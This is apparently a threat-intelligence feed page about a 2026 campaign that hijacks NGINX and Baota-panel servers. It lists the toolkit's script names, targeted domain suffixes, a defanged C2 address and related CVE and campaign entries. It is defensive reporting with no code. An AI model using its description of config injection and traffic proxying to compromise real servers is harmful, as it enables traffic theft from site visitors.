NGINX hijack toolkit that injects configs and exfiltrates mapping data
Malware Activity
Summary
Hide ▲
Show ▼
A scripted multi-stage toolkit is automating NGINX configuration injection, service reloads, and C2 exfiltration to hijack traffic on compromised hosts. The toolkit’s stages use scripts such as zx.sh, bt.sh, 4zdh.sh, zdh.sh, and ok.sh to modify configuration files, preserve legitimate-looking headers, and map hijacked domains. It targets NGINX installations and Baota hosting panels, with emphasis on sites using .in and .id domains as well as .edu and .gov sites. The activity matters because it hides malicious routing inside normal NGINX behavior, making the traffic diversion difficult to spot without specific monitoring.
Related Happenings
NGINX Plus and NGINX Open Source ngx_http_rewrite_module heap buffer overflow remote code execution flaw (CVE-2026-42945)
Vulnerability
First: 14.05.2026 09:00
Last: 14.05.2026 09:00
Sources 1
About this happening:
**CVE-2026-42945** exposes a **heap buffer overflow** in **NGINX Plus** and **NGINX Open Source** through **ngx_http_rewrite_module**, creating risk of **unauthenticated remote co...
NGINX Plus and NGINX Open Source ngx_http_rewrite_module heap buffer overflow remote code execution flaw (CVE-2026-42945)
VulnerabilityAbout this happening: **CVE-2026-42945** exposes a **heap buffer overflow** in **NGINX Plus** and **NGINX Open Source** through **ngx_http_rewrite_module**, creating risk of **unauthenticated remote co...
Active web traffic hijacking campaign targeting NGINX and Baota panels
Campaign
First: 05.02.2026 06:56
Last: 05.02.2026 06:56
Sources 1
About this happening:
An active **web traffic hijacking campaign** is targeting **NGINX** installations and **Baota (BT)** management panels, putting legitimate site traffic at risk of redirection thro...
Active web traffic hijacking campaign targeting NGINX and Baota panels
CampaignAbout this happening: An active **web traffic hijacking campaign** is targeting **NGINX** installations and **Baota (BT)** management panels, putting legitimate site traffic at risk of redirection thro...
NGINX traffic hijacking campaign targeting Asian and government domains
Campaign
First: 05.02.2026 01:26
Last: 05.02.2026 01:26
Sources 1
How related:
A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure.
About this happening:
A **threat actor** is running an active **traffic-hijacking campaign** against **NGINX servers**, rerouting user requests through attacker infrastructure and increasing the risk o...
NGINX traffic hijacking campaign targeting Asian and government domains
CampaignHow related: A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure.
About this happening: A **threat actor** is running an active **traffic-hijacking campaign** against **NGINX servers**, rerouting user requests through attacker infrastructure and increasing the risk o...
Timeline
-
05.02.2026 01:26 2 articles · 3mo ago
DataDog Security Labs discloses NGINX traffic-hijack toolkit
Initial DisclosureOn 2026-02-04, DataDog Security Labs disclosed a campaign compromising NGINX servers and Baota hosting management panels to hijack user traffic by injecting malicious NGINX location blocks and proxying requests through attacker-controlled backend infrastructure. The staged toolkit uses zx.sh, bt.sh, 4zdh.sh, zdh.sh, and ok.sh to modify configuration files, validate and reload NGINX, preserve normal request headers, and exfiltrate hijack mappings to 158.94.210[.]227, with targeting focused on .in, .id, .pe, .bd, .th, .edu, and .gov sites.
Show sources
- Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26